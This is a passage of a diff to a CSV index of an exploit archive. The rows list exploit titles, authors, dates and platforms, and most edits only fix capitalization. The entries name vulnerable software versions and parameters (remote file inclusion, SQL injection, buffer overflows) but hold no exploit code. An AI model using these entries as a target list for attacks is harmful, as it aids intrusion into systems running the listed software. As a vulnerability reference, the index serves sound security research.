Pro 8.0 - merchants/index.php Multiple Parameter Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0 +30370,platforms/php/webapps/30370.txt,"Alstrasoft Affiliate Network Pro 8.0 - merchants/temp.php rowid Parameter Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0 +30371,platforms/php/webapps/30371.txt,"Alstrasoft Affiliate Network Pro 8.0 - merchants/index.php uploadProducts Action pgmid Parameter SQL Injection",2007-07-23,Lostmon,php,webapps,0 29712,platforms/php/local/29712.txt,"Zend Platform 2.2.1 - PHP.INI File Modification",2007-03-03,"Stefan Esser",php,local,0 29713,platforms/linux/dos/29713.html,"KDE Konqueror 3.5 - JavaScript IFrame Denial of Service",2007-03-05,mark,linux,dos,0 29714,platforms/linux/local/29714.txt,"Linux Kernel 2.6.17 - 'Sys_Tee' Privilege Escalation",2007-03-05,"Michael Kerrisk",linux,local,0 29715,platforms/php/webapps/29715.txt,"EPortfolio 1.0 - Client Side Input Validation",2007-03-05,"Stefan Friedli",php,webapps,0 29716,platforms/linux/dos/29716.txt,"Silc Server 1.0.2 - New Channel Remote Denial of Service",2007-03-06,"Frank Benkstein",linux,dos,0 29717,platforms/linux/dos/29717.txt,"radscan conquest 8.2 - Multiple Vulnerabilities",2007-03-07,"Luigi Auriemma",linux,dos,0 -29798,platforms/windows/local/29798.pl,"ALLPlayer 5.7 - '.m3u' SEH Buffer Overflow (Unicode)",2013-11-24,"Mike Czumak",windows,local,0 +29798,platforms/windows/local/29798.pl,"ALLPlayer 5.7 - '.m3u' SEH Buffer Overflow 'UNICODE'",2013-11-24,"Mike Czumak",windows,local,0 29720,platforms/linux/dos/29720.txt,"Mozilla Firefox 2.0.0.2 - Document.Cookie Path Argument Denial of Service",2007-03-08,"Nicolas DEROUET",linux,dos,0 29721,platforms/windows/dos/29721.pl,"Fish - Multiple Remote Buffer Overflow Vulnerabilities",2007-03-08,"ilja van sprundel",windows,dos,0 29722,platforms/php/webapps/29722.txt,"JCCorp URLShrink Free 1.3.1 - CreateURL.php Remote File Inclusion",2007-03-09,"Hasadya Raed",php,webapps,0 @@ -26766,9 +26767,9 @@ id,file,description,date,author,platform,type,port 29724,platforms/linux/dos/29724.txt,"MySQL 5.0.x - Single Row SubSelect Remote Denial of Service",2007-03-09,S.Streichsbier,linux,dos,0 29725,platforms/openbsd/remote/29725.py,"OpenBSD 3.x/4.x - ICMPv6 Packet Handling Remote Buffer Overflow",2007-03-09,"Alfredo Ortega",openbsd,remote,0 29726,platforms/asp/webapps/29726.pl,"Duyuru Scripti - Goster.asp SQL Injection",2007-03-09,Cr@zy_King,asp,webapps,0 -29727,platforms/php/webapps/29727.txt,"Premod SubDog 2 - includes/functions_kb.php PHPbb_root_path Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 -29728,platforms/php/webapps/29728.txt,"Premod SubDog 2 - includes/themen_portal_mitte.php PHPbb_root_path Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 -29729,platforms/php/webapps/29729.txt,"Premod SubDog 2 - includes/logger_engine.php PHPbb_root_path Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 +29727,platforms/php/webapps/29727.txt,"Premod SubDog 2 - includes/functions_kb.php phpbb_root_path Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 +29728,platforms/php/webapps/29728.txt,"Premod SubDog 2 - includes/themen_portal_mitte.php phpbb_root_path Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 +29729,platforms/php/webapps/29729.txt,"Premod SubDog 2 - includes/logger_engine.php phpbb_root_path Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 29730,platforms/php/webapps/29730.txt,"SoftNews 4.1/5.5 - engine/init.php root_dir Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 29731,platforms/php/webapps/29731.txt,"SoftNews 4.1/5.5 - engine/Ajax/editnews.php root_dir Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 29732,platforms/php/remote/29732.php,"PHP 5.2 - EXT/Filter Function Remote Buffer Overflow",2007-03-12,"Stefan Esser",php,remote,0 @@ -26780,7 +26781,7 @@ id,file,description,date,author,platform,type,port 29738,platforms/windows/dos/29738.txt,"Microsoft Windows XP/2000 - WinMM.dll .WAV Files Remote Denial of Service (Denial of Service)",2007-03-13,"Michal Majchrowicz",windows,dos,0 29739,platforms/linux/remote/29739.txt,"Apache HTTP Server Tomcat 5.x/6.0.x - Directory Traversal",2007-03-14,"D. Matscheko",linux,remote,0 29740,platforms/windows/dos/29740.txt,"MiniGZip - Controls File_Compress Buffer Overflow",2007-03-14,starcadi,windows,dos,0 -29741,platforms/windows/remote/29741.txt,"Microsoft Internet Explorer 7.0 - NavCancel.HTM Cross-Site Scripting",2007-03-14,"Aviv Raff",windows,remote,0 +29741,platforms/windows/remote/29741.txt,"Microsoft Internet Explorer 7 - NavCancel.HTM Cross-Site Scripting",2007-03-14,"Aviv Raff",windows,remote,0 29742,platforms/php/webapps/29742.txt,"Horde IMP Webmail 4.0.4 Client - Multiple Input Validation Vulnerabilities",2007-03-15,"Immerda Project Group",php,webapps,0 29743,platforms/windows/dos/29743.txt,"Symantec SYMTDI.SYS Device Driver - Local Denial of Service (Denial of Service)",2007-03-15,"David Matousek",windows,dos,0 29744,platforms/php/webapps/29744.txt,"Viper Web Portal 0.1 - 'index.php' Remote File Inclusion",2007-03-15,"Abdus Samad",php,webapps,0 @@ -26793,7 +26794,7 @@ id,file,description,date,author,platform,type,port 29751,platforms/php/webapps/29751.php,"phpStats 0.1.9 - PHP-Stats-options.php Remote Code Execution",2007-03-17,rgod,php,webapps,0 29752,platforms/php/remote/29752.php,"PHP 5.1.6 - Mb_Parse_Str Function Register_Globals Activation",2007-03-19,"Stefan Esser",php,remote,0 29753,platforms/linux/remote/29753.c,"File(1) 4.13 - Command File_PrintF Integer Underflow",2007-03-19,"Jean-Sebastien Guay-Leroux",linux,remote,0 -29754,platforms/php/webapps/29754.html,"Wordpress 2.x - PHP_Self Cross-Site Scripting",2007-03-19,"Alexander Concha",php,webapps,0 +29754,platforms/php/webapps/29754.html,"WordPress 2.x - PHP_Self Cross-Site Scripting",2007-03-19,"Alexander Concha",php,webapps,0 29755,platforms/php/webapps/29755.html,"Guesbara 1.2 - Administrator Password Change",2007-03-19,Kacper,php,webapps,0 29756,platforms/php/webapps/29756.txt,"PHPX 3.5.15/3.5.16 - print.php news_id Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 29757,platforms/php/webapps/29757.txt,"PHPX 3.5.15/3.5.16 - forums.php Multiple Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 @@ -26805,7 +26806,7 @@ id,file,description,date,author,platform,type,port 29763,platforms/php/webapps/29763.php,"W-Agora 4.2.1 - Multiple Arbitrary File Upload Vulnerabilities",2007-03-20,"laurent gaffie",php,webapps,0 29764,platforms/php/webapps/29764.txt,"W-Agora 4.2.1 - profile.php showuser Parameter Cross-Site Scripting",2007-03-20,"laurent gaffie",php,webapps,0 29765,platforms/php/webapps/29765.txt,"W-Agora 4.2.1 - search.php search_user Parameter Cross-Site Scripting",2007-03-20,"laurent gaffie",php,webapps,0 -29766,platforms/php/webapps/29766.txt,"W-Agora 4.2.1 - change_password.php userid Parameter Cross-Site Scripting",2007-03-20,"laurent gaffie",php,webapps,0 +29766,platforms/php/webapps/29766.txt,"W-Agora 4.2.1 - 'change_password.php' userid Parameter Cross-Site Scripting",2007-03-20,"laurent gaffie",php,webapps,0 29767,platforms/hardware/dos/29767.txt,"ZYXEL Router 3.40 Zynos - SMB Data Handling Denial of Service",2007-03-20,"Joxean Koret",hardware,dos,0 29768,platforms/linux/remote/29768.txt,"Mozilla FireFox 1.5.x/2.0 - FTP PASV Port-Scanning",2007-03-21,mark,linux,remote,0 29769,platforms/linux/remote/29769.txt,"Opera 9.x - FTP PASV Port-Scanning",2007-03-21,mark,linux,remote,0 @@ -26816,7 +26817,7 @@ id,file,description,date,author,platform,type,port 29774,platforms/php/webapps/29774.txt,"Free File Hosting System 1.1 - register.php AD_BODY_TEMP Parameter Remote File Inclusion",2007-03-24,IbnuSina,php,webapps,0 29775,platforms/php/webapps/29775.txt,"Image_Upload Script 2.0 - Multiple Remote File Inclusion",2007-03-26,Crackers_Child,php,webapps,0 29776,platforms/php/webapps/29776.txt,"CcCounter 2.0 - 'index.php' Cross-Site Scripting",2007-03-26,Crackers_Child,php,webapps,0 -29777,platforms/windows/local/29777.pl,"Light Alloy 4.7.3 - '.m3u' SEH Buffer Overflow (Unicode)",2013-11-22,"Mike Czumak",windows,local,0 +29777,platforms/windows/local/29777.pl,"Light Alloy 4.7.3 - '.m3u' SEH Buffer Overflow 'UNICODE'",2013-11-22,"Mike Czumak",windows,local,0 29780,platforms/php/webapps/29780.txt,"Mephisto Blog 0.7.3 - Search Function Cross-Site Scripting",2007-03-26,The[Boss],php,webapps,0 29781,platforms/linux/dos/29781.c,"Linux Kernel 2.6.x - IPv6_SockGlue.c NULL Pointer Dereference Denial of Service",2007-03-26,"Joey Mengele",linux,dos,0 29782,platforms/php/webapps/29782.txt,"Satel Lite - Satellite.php Local File Inclusion",2007-11-26,rUnViRuS,php,webapps,0 @@ -26824,12 +26825,12 @@ id,file,description,date,author,platform,type,port 29784,platforms/php/remote/29784.php,"PHP 5.2.1 - Folded Mail Headers Email Header Injection",2007-11-26,"Stefan Esser",php,remote,0 29785,platforms/php/remote/29785.txt,"aBitWhizzy - whizzypic.php d Variable Traversal Arbitrary Directory Listing",2007-03-14,Lostmon,php,remote,0 29786,platforms/php/webapps/29786.txt,"aBitWhizzy - whizzylink.php d Variable Traversal Arbitrary Directory Listing",2007-03-14,Lostmon,php,webapps,0 -29787,platforms/windows/dos/29787.py,"HP Jetdirect FTP Print Server - RERT Command Denial of Service",2007-01-18,Handrix,windows,dos,0 +29787,platforms/windows/dos/29787.py,"HP JetDirect FTP Print Server - RERT Command Denial of Service",2007-01-18,Handrix,windows,dos,0 29788,platforms/php/remote/29788.php,"PHP 4.4.4 - Zip_Entry_Read() Integer Overflow",2007-03-27,"Stefan Esser",php,remote,0 30783,platforms/windows/local/30783.py,"CCProxy 7.3 - Integer Overflow",2014-01-07,Mr.XHat,windows,local,0 -30105,platforms/php/webapps/30105.txt,"Wordpress Download Manager Free & Pro 2.5.8 Plugin - Persistent Cross-Site Scripting",2013-12-08,"Jeroen - IT Nerdbox",php,webapps,0 -30157,platforms/php/webapps/30157.txt,"Joomla JD-Wiki 1.0.2 - dwpage.php mosConfig_absolute_path Parameter Remote File Inclusion",2007-06-06,DarkbiteX,php,webapps,0 -30158,platforms/php/webapps/30158.txt,"Joomla JD-Wiki 1.0.2 - wantedpages.php mosConfig_absolute_path Parameter Remote File Inclusion",2007-06-06,DarkbiteX,php,webapps,0 +30105,platforms/php/webapps/30105.txt,"WordPress Download Manager Free & Pro 2.5.8 Plugin - Persistent Cross-Site Scripting",2013-12-08,"Jeroen - IT Nerdbox",php,webapps,0 +30157,platforms/php/webapps/30157.txt,"Joomla JD-Wiki 1.0.2 - dwpage.php MosConfig_absolute_path Parameter Remote File Inclusion",2007-06-06,DarkbiteX,php,webapps,0 +30158,platforms/php/webapps/30158.txt,"Joomla JD-Wiki 1.0.2 - wantedpages.php MosConfig_absolute_path Parameter Remote File Inclusion",2007-06-06,DarkbiteX,php,webapps,0 30107,platforms/php/webapps/30107.txt,"Ovidentia 7.9.6 - Multiple Vulnerabilities",2013-12-08,sajith,php,webapps,0 30109,platforms/php/webapps/30109.txt,"Particle Gallery 1.0 - search.php Cross-Site Scripting",2007-05-30,Serapis.net,php,webapps,0 30110,platforms/linux/dos/30110.c,"Bochs 2.3 - Buffer Overflow / Denial of Service",2007-05-31,"Tavis Ormandy",linux,dos,0 @@ -26840,18 +26841,18 @@ id,file,description,date,author,platform,type,port 30115,platforms/php/webapps/30115.txt,"PHP JackKnife 2.21 - (PHPJK) UserArea/NewAccounts/index.php sAccountUnq Parameter Cross-Site Scripting",2007-05-31,"laurent gaffie",php,webapps,0 30116,platforms/php/webapps/30116.txt,"PHP JackKnife 2.21 - (PHPJK) G_Display.php Multiple Parameter Cross-Site Scripting",2007-05-31,"laurent gaffie",php,webapps,0 30117,platforms/php/remote/30117.php,"PHP 5.1.6 - Chunk_Split() Function Integer Overflow",2007-05-31,"Gerhard Wagner",php,remote,0 -30118,platforms/php/webapps/30118.txt,"Prototype of an PHP application 0.1 - gestion/index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30119,platforms/php/webapps/30119.txt,"Prototype of an PHP application 0.1 - ident/identification.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30120,platforms/php/webapps/30120.txt,"Prototype of an PHP application 0.1 - ident/disconnect.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30121,platforms/php/webapps/30121.txt,"Prototype of an PHP application 0.1 - ident/loginliste.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30122,platforms/php/webapps/30122.txt,"Prototype of an PHP application 0.1 - ident/loginmodif.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30123,platforms/php/webapps/30123.txt,"Prototype of an PHP application 0.1 - ident/index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30124,platforms/php/webapps/30124.txt,"Prototype of an PHP application 0.1 - ident/ident.inc.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30125,platforms/php/webapps/30125.txt,"Prototype of an PHP application 0.1 - menu/menuprincipal.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30126,platforms/php/webapps/30126.txt,"Prototype of an PHP application 0.1 - Parameter/Parameter.inc.php path_inc Parametereter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30127,platforms/php/webapps/30127.txt,"Prototype of an PHP application 0.1 - plugins/PHPgacl/index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30128,platforms/php/webapps/30128.txt,"Prototype of an PHP application 0.1 - 'index.php' path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30129,platforms/php/webapps/30129.txt,"Prototype of an PHP application 0.1 - common.inc.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30118,platforms/php/webapps/30118.txt,"Prototype of an PHP Application 0.1 - gestion/index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30119,platforms/php/webapps/30119.txt,"Prototype of an PHP Application 0.1 - ident/identification.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30120,platforms/php/webapps/30120.txt,"Prototype of an PHP Application 0.1 - ident/disconnect.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30121,platforms/php/webapps/30121.txt,"Prototype of an PHP Application 0.1 - ident/loginliste.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30122,platforms/php/webapps/30122.txt,"Prototype of an PHP Application 0.1 - ident/loginmodif.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30123,platforms/php/webapps/30123.txt,"Prototype of an PHP Application 0.1 - ident/index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30124,platforms/php/webapps/30124.txt,"Prototype of an PHP Application 0.1 - ident/ident.inc.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30125,platforms/php/webapps/30125.txt,"Prototype of an PHP Application 0.1 - menu/menuprincipal.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30126,platforms/php/webapps/30126.txt,"Prototype of an PHP Application 0.1 - Parameter/Parameter.inc.php path_inc Parameters Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30127,platforms/php/webapps/30127.txt,"Prototype of an PHP Application 0.1 - plugins/PHPgacl/index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30128,platforms/php/webapps/30128.txt,"Prototype of an PHP Application 0.1 - 'index.php' path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30129,platforms/php/webapps/30129.txt,"Prototype of an PHP Application 0.1 - common.inc.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 30130,platforms/php/remote/30130.txt,"PHP 5.2.3 - EXT/Session HTTP Response Header Injection",2007-06-04,"Stefan Esser",php,remote,0 30131,platforms/php/webapps/30131.txt,"Buttercup WFM - Title Parameter Cross-Site Scripting",2007-06-01,"John Martinelli",php,webapps,0 30132,platforms/php/webapps/30132.txt,"Evenzia Content Management Systems (CMS) - Cross-Site script",2007-06-01,"Glafkos Charalambous ",php,webapps,0 @@ -26874,12 +26875,12 @@ id,file,description,date,author,platform,type,port 30154,platforms/windows/local/30154.pl,"GOM Player 2.2.53.5169 - SEH Buffer Overflow (.reg)",2013-12-09,"Mike Czumak",windows,local,0 30159,platforms/asp/webapps/30159.txt,"ASP Folder Gallery - Download_Script.asp Arbitrary File Download",2007-06-06,freeprotect.net,asp,webapps,0 30160,platforms/windows/dos/30160.txt,"Microsoft Windows XP - GDI+ ICO File Remote Denial of Service",2007-06-06,"Dennis Rand",windows,dos,0 -30161,platforms/php/webapps/30161.txt,"Atom PhotoBlog 1.0.1/1.0.9 - AtomPhotoBlog.php Multiple Input Validation Vulnerabilities",2007-06-07,Serapis.net,php,webapps,0 +30161,platforms/php/webapps/30161.txt,"Atom Photoblog 1.0.1/1.0.9 - AtomPhotoblog.php Multiple Input Validation Vulnerabilities",2007-06-07,Serapis.net,php,webapps,0 30162,platforms/php/webapps/30162.txt,"WMSCMS 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-07,"Glafkos Charalambous ",php,webapps,0 30163,platforms/multiple/dos/30163.html,"Blue Coat Systems K9 Web Protection 32.36 - Remote Buffer Overflow",2007-06-08,"Dennis Rand",multiple,dos,0 30164,platforms/hardware/remote/30164.txt,"3Com OfficeConnect Secure Router 1.04-168 - Tk Parameter Cross-Site Scripting",2007-06-08,"Secunia Research",hardware,remote,0 30165,platforms/asp/webapps/30165.txt,"Ibrahim Ã?AKICI - Okul Portal Haber_Oku.asp SQL Injection",2007-06-08,ertuqrul,asp,webapps,0 -30166,platforms/php/webapps/30166.txt,"Wordpress 2.2 - Request_URI Parameter Cross-Site Scripting",2007-06-08,zamolx3,php,webapps,0 +30166,platforms/php/webapps/30166.txt,"WordPress 2.2 - Request_URI Parameter Cross-Site Scripting",2007-06-08,zamolx3,php,webapps,0 30167,platforms/hardware/dos/30167.txt,"Packeteer PacketShaper 7.x - Web Interface Remote Denial of Service",2007-06-08,nnposter,hardware,dos,0 30168,platforms/php/webapps/30168.txt,"vBSupport 2.0.0 Integrated Ticket System - vBSupport.php SQL Injection",2007-06-09,rUnViRuS,php,webapps,0 30169,platforms/windows/remote/30169.txt,"WindowsPT 1.2 - User ID Key Spoofing",2007-06-11,nnposter,windows,remote,0 @@ -26900,11 +26901,11 @@ id,file,description,date,author,platform,type,port 29796,platforms/hardware/webapps/29796.pl,"Pirelli Discus DRG A125g - Remote Change WiFi Password",2013-11-24,"Sebastián Magof",hardware,webapps,0 29797,platforms/php/webapps/29797.txt,"MyBB Ajaxfs 2 Plugin - SQL Injection",2013-11-24,"IeDb ir",php,webapps,0 29799,platforms/windows/local/29799.pl,"Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow",2013-11-24,"Mike Czumak",windows,local,0 -29800,platforms/windows/dos/29800.py,"Microsoft Internet Explorer 7.0 - HTML Denial of Service",2007-03-28,shinnai,windows,dos,0 -29801,platforms/php/local/29801.php,"PHP 5.2.1 - Session.Save_Path() TMPDIR Open_Basedir Restriction Bypass",2007-03-28,"Stefan Esser",php,local,0 +29800,platforms/windows/dos/29800.py,"Microsoft Internet Explorer 7 - HTML Denial of Service",2007-03-28,shinnai,windows,dos,0 +29801,platforms/php/local/29801.php,"PHP 5.2.1 - Session.Save_Path() TMPDIR open_basedir Restriction Bypass",2007-03-28,"Stefan Esser",php,local,0 29802,platforms/hardware/webapps/29802.txt,"TPLINK WR740N/WR740ND - Multiple Cross-Site Request Forgery Vulnerabilities",2013-11-25,"Samandeep Singh",hardware,webapps,0 29803,platforms/windows/dos/29803.pl,"Static Http Server 1.0 - Denial of Service (Denial of Service) Exploit",2013-11-25,GalaxyAndroid,windows,dos,0 -29804,platforms/php/local/29804.php,"PHP 5.2.1 - Multiple Functions Reference Parameter Information Disclosure",2007-03-29,"Stefan Esser",php,local,0 +29804,platforms/php/local/29804.php,"PHP 5.2.1 - Multiple functions Reference Parameter Information Disclosure",2007-03-29,"Stefan Esser",php,local,0 29805,platforms/php/webapps/29805.txt,"Drake CMS 0.3.7 - 404.php Local File Inclusion",2007-03-30,"HACKERS PAL",php,webapps,0 29806,platforms/php/webapps/29806.pl,"PHP-Fusion 6.1.5 - Calendar_Panel Module Show_Event.php SQL Injection",2007-03-31,UNIQUE-KEY,php,webapps,0 29807,platforms/php/remote/29807.php,"PHP 5.1.6 - Imap_Mail_Compose() Function Buffer Overflow",2007-03-31,"Stefan Esser",php,remote,0 @@ -26914,14 +26915,14 @@ id,file,description,date,author,platform,type,port 29813,platforms/windows/dos/29813.py,"Microsoft Windows Vista - ARP Table Entries Denial of Service",2004-04-02,"Kristian Hermansen",windows,dos,0 29814,platforms/windows/remote/29814.txt,"NextPage LivePublish 2.02 - LPEXT.dll Cross-Site Scripting",2007-04-03,"Igor Monteiro Vieira",windows,remote,0 29815,platforms/hardware/remote/29815.rb,"NETGEAR ReadyNAS - Perl Code Evaluation",2013-11-25,Metasploit,hardware,remote,443 -29816,platforms/windows/dos/29816.c,"FastStone Image Viewer 2.9/3.6 - .bmp Image Handling Memory Corruption",2007-04-04,"Ivan Fratric",windows,dos,0 +29816,platforms/windows/dos/29816.c,"FastStone Image Viewer 2.9/3.6 - '.bmp' Image Handling Memory Corruption",2007-04-04,"Ivan Fratric",windows,dos,0 29817,platforms/asp/webapps/29817.txt,"Gazi Okul Sitesi 2007 - Fotokategori.asp SQL Injection",2007-04-04,CoNqUeRoR,asp,webapps,0 29818,platforms/windows/dos/29818.c,"ACDSee 9.0 Photo Manager - Multiple BMP Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0 -29819,platforms/windows/dos/29819.c,"IrfanView 3.99 - Multiple BMP Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0 +29819,platforms/windows/dos/29819.c,"Irfanview 3.99 - Multiple BMP Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0 29820,platforms/multiple/remote/29820.html,"Firebug 1.03 - Rep.JS Script Code Injection",2007-03-06,"Thor Larholm",multiple,remote,0 29821,platforms/php/webapps/29821.txt,"Livor 2.5 - 'index.php' Cross-Site Scripting",2007-04-06,"Arham Muhammad",php,webapps,0 29822,platforms/linux/local/29822.c,"Man Command - -H Flag Local Buffer Overflow",2007-04-06,"Daniel Roethlisberger",linux,local,0 -29823,platforms/php/dos/29823.c,"PHP 5.2.1 GD Extension - .WBMP File Integer Overflow Vulnerabilities",2007-04-07,"Ivan Fratric",php,dos,0 +29823,platforms/php/dos/29823.c,"PHP 5.2.1 GD Extension - '.WBMP' File Integer Overflow Vulnerabilities",2007-04-07,"Ivan Fratric",php,dos,0 29824,platforms/php/webapps/29824.txt,"QuizShock 1.6.1 - auth.php HTML Injection",2007-04-09,"John Martinelli",php,webapps,0 29825,platforms/php/webapps/29825.txt,"UBB.Threads 6.1.1 - UBBThreads.php SQL Injection",2007-04-09,"John Martinelli",php,webapps,0 29826,platforms/linux/dos/29826.txt,"Linux Kernel 2.6.x - AppleTalk ATalk_Sum_SKB Function Denial of Service",2007-04-09,"Jean Delvare",linux,dos,0 @@ -26932,7 +26933,7 @@ id,file,description,date,author,platform,type,port 29831,platforms/php/webapps/29831.txt,"DropAFew 0.2 - newaccount2.php Arbitrary Account Creation",2007-04-10,"Alexander Klink",php,webapps,0 29832,platforms/php/webapps/29832.txt,"DropAFew 0.2 - search.php delete Action id Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 29833,platforms/php/webapps/29833.txt,"DropAFew 0.2 - editlogcal.php save Action calories Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 -29834,platforms/php/webapps/29834.txt,"Wordpress dzs-videogallery Plugins - Remote File Upload",2013-11-26,link_satisi,php,webapps,0 +29834,platforms/php/webapps/29834.txt,"WordPress dzs-videogallery Plugins - Remote File Upload",2013-11-26,link_satisi,php,webapps,0 29952,platforms/windows/remote/29952.html,"Sienzo Digital Music Mentor - DSKernel2.dll ActiveX Control Stack Buffer Overflow",2007-05-07,shinnai,windows,remote,0 29937,platforms/windows/dos/29937.txt,"Aventail Connect 4.1.2.13 - Hostname Remote Buffer Overflow",2007-04-30,"Thomas Pollet",windows,dos,0 29838,platforms/php/webapps/29838.txt,"DotClear 1.2.x - /ecrire/trackback.php post_id Parameter Cross-Site Scripting",2007-04-11,nassim,php,webapps,0 @@ -26965,7 +26966,7 @@ id,file,description,date,author,platform,type,port 29866,platforms/php/webapps/29866.txt,"PHP-Nuke 8.0.3.3b - SQL Injection Protection Bypass / Multiple SQL Injection",2007-04-17,Aleksandar,php,webapps,0 29867,platforms/windows/dos/29867.xml,"NetSprint Ask IE Toolbar 1.1 - Multiple Denial of Service Vulnerabilities",2007-04-17,"Michal Bucko",windows,dos,0 29868,platforms/php/webapps/29868.txt,"NuclearBB Alpha 1 - Multiple SQL Injections",2007-04-18,"John Martinelli",php,webapps,0 -29869,platforms/php/webapps/29869.php,"Fully Modded PHPBB2 - PHPBB_Root_Path Remote File Inclusion",2007-04-19,"HACKERS PAL",php,webapps,0 +29869,platforms/php/webapps/29869.php,"Fully Modded PHPBB2 - phpbb_root_path Remote File Inclusion",2007-04-19,"HACKERS PAL",php,webapps,0 29870,platforms/php/webapps/29870.txt,"Exponent CMS 0.96.5/0.96.6 - magpie_debug.php url Parameter Cross-Site Scripting",2007-04-20,"Hamid Ebadi",php,webapps,0 29871,platforms/php/webapps/29871.txt,"Exponent CMS 0.96.5/0.96.6 - magpie_slashbox.php rss_url Parameter Cross-Site Scripting",2007-04-20,"Hamid Ebadi",php,webapps,0 29872,platforms/php/webapps/29872.txt,"Exponent CMS 0.96.5/0.96.6 - iconspopup.php icodir Variable Traversal Arbitrary Directory Listing",2007-04-20,"Hamid Ebadi",php,webapps,0 @@ -26977,10 +26978,10 @@ id,file,description,date,author,platform,type,port 29878,platforms/php/webapps/29878.txt,"Allfaclassifieds 6.04 - Level2.php Remote File Inclusion",2007-04-23,Dr.RoVeR,php,webapps,0 29879,platforms/php/webapps/29879.txt,"PHPMyBibli 1.32 - Init.Inc.php Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0 29880,platforms/php/webapps/29880.txt,"File117 - Multiple Remote File Inclusion",2007-04-23,InyeXion,php,webapps,0 -29881,platforms/windows/local/29881.txt,"Adobe Acrobat Reader - ASLR/DEP Bypass Exploit with SANDBOX BYPASS",2013-11-28,"w3bd3vil and abh1sek",windows,local,0 +29881,platforms/windows/local/29881.txt,"Adobe Acrobat Reader - ASLR + DEP Bypass Exploit with SANDBOX Bypass",2013-11-28,"w3bd3vil and abh1sek",windows,local,0 29882,platforms/php/webapps/29882.html,"PHPMySpace Gold 8.10 - article.php SQL Injection",2007-04-23,"John Martinelli",php,webapps,0 29883,platforms/php/webapps/29883.txt,"ACVSWS - Transport.php Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0 -29884,platforms/multiple/remote/29884.txt,"Apple Quicktime 7.1.5 - QTJava toQTPointer() Java Handling Arbitrary Code Execution",2007-04-23,"Shane Macaulay",multiple,remote,0 +29884,platforms/multiple/remote/29884.txt,"Apple QuickTime 7.1.5 - QTJava toQTPointer() Java Handling Arbitrary Code Execution",2007-04-23,"Shane Macaulay",multiple,remote,0 29885,platforms/php/webapps/29885.txt,"Claroline 1.x - RootSys Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0 29886,platforms/php/webapps/29886.txt,"Lms 1.5.x - RTMessageAdd.php Remote File Inclusion",2007-04-23,InyeXion,php,webapps,0 29887,platforms/php/webapps/29887.txt,"Phorum 5.1.20 - admin.php Groups Module group_id Parameter Cross-Site Scripting",2007-04-23,"Janek Vind",php,webapps,0 @@ -27009,18 +27010,18 @@ id,file,description,date,author,platform,type,port 29910,platforms/php/webapps/29910.txt,"HTMLEditBox 2.2 - config.php Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 29911,platforms/php/webapps/29911.txt,"DynaTracker 1.5.1 - includes_handler.php base_path Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 29912,platforms/php/webapps/29912.txt,"DynaTracker 1.5.1 - action.php base_path Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 -29913,platforms/php/webapps/29913.txt,"Active PHP Bookmarks 1.0 - APB.php Remote File Inclusion",2007-04-25,"ali & saeid",php,webapps,0 +29913,platforms/php/webapps/29913.txt,"Active PHP BookMarks 1.0 - APB.php Remote File Inclusion",2007-04-25,"ali & saeid",php,webapps,0 29914,platforms/php/webapps/29914.txt,"Doruk100Net - Info.php Remote File Inclusion",2007-04-26,Ali7,php,webapps,0 29915,platforms/php/webapps/29915.txt,"MoinMoin 1.5.x - 'index.php' Cross-Site Scripting",2007-04-26,"En Douli",php,webapps,0 